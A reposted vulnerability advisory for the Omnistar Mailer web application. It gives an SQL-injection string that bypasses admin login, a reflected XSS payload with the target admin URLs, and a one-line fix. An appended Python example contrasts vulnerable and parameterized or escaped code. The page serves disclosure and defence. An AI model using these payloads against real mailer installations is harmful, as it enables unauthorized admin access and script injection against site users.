好得很程序员自学网


Omnistar Mailer: Multiple Flaws and Fixes - Website Security

Title: Omnistar Mailer SQLi Vulnerability

Vendor site: http://HdhCmsTestomnistarmailer测试数据/

Author: Sid3^effects aKa HaRi <shell_c99[at]yahoo测试数据>

Description:

Are you a business and you are looking to increase your profit? Omnistar mailing list software will allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.

 

1. Admin authentication flaw

Universal password: ' or 1=1 or ''='

Test URL:

http://HdhCmsTest2cto测试数据 /mailerd4/admin/index.php

 

2. XSS

Attack pattern: "><script>alert("Sid3^effects")</script>

Test URL: http://HdhCmsTest2cto测试数据 /mailerd4/admin/contacts.php?op=[xss]

 

 

Fix: strengthen validation and filtering.

 

# 0day no more

# Sid3^effects
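What the "strengthen validation and filtering" fix means for the two flaws above, as an added example that is not Omnistar Mailer's code and not from the advisory's author: a concatenated login query beside a parameterized one, and a raw echo of `op` beside an allow-listed, encoded one. The table layout, the query shape, the `op` values and the assumption that `op` is reflected into an HTML attribute are all hypothetical, since the page shows none of the application's source.

```python
import hashlib
import html
import sqlite3

SQLI = "' or 1=1 or ''='"                               # string from section 1
XSS = '"><script>alert("Sid3^effects")</script>'        # string from section 2
ALLOWED_OPS = {"list", "add", "edit"}                   # hypothetical op values

def pw_hash(password):
    # Fixed salt keeps the demo deterministic; use a random per-user salt in practice.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"constructed", 100_000).hex()

def make_db():
    # Constructed stand-in for the admin table; the real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO admin VALUES (?, ?)", ("admin", pw_hash("constructed-pw")))
    return db

def login_vulnerable(db, user, password):
    # Before: input is pasted into the SQL text, so its quotes become SQL syntax.
    sql = ("SELECT 1 FROM admin WHERE username = '%s' AND pw_hash = '%s'"
           % (user, pw_hash(password)))
    return db.execute(sql).fetchone() is not None

def login_hardened(db, user, password):
    # After: placeholders keep input as data, whatever characters it contains.
    sql = "SELECT 1 FROM admin WHERE username = ? AND pw_hash = ?"
    return db.execute(sql, (user, pw_hash(password))).fetchone() is not None

def render_op_vulnerable(op):
    # Before: the request value is echoed into an attribute unchanged.
    return '<input type="hidden" name="op" value="%s">' % op

def render_op_hardened(op):
    # After: validate against an allow-list, then encode on output anyway.
    if op not in ALLOWED_OPS:
        op = "list"
    return '<input type="hidden" name="op" value="%s">' % html.escape(op, quote=True)

if __name__ == "__main__":
    db = make_db()
    print("concatenated query accepts the string:", login_vulnerable(db, SQLI, "x"))
    print("parameterized query accepts the string:", login_hardened(db, SQLI, "x"))
    print("valid login still works:", login_hardened(db, "admin", "constructed-pw"))
    print("raw echo:     ", render_op_vulnerable(XSS))
    print("hardened echo:", render_op_hardened(XSS))
```

In the concatenated query the trailing `or ''='` absorbs the `AND pw_hash = ...` clause, which is why the password check never runs; with placeholders the same string is just a username that matches no row.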
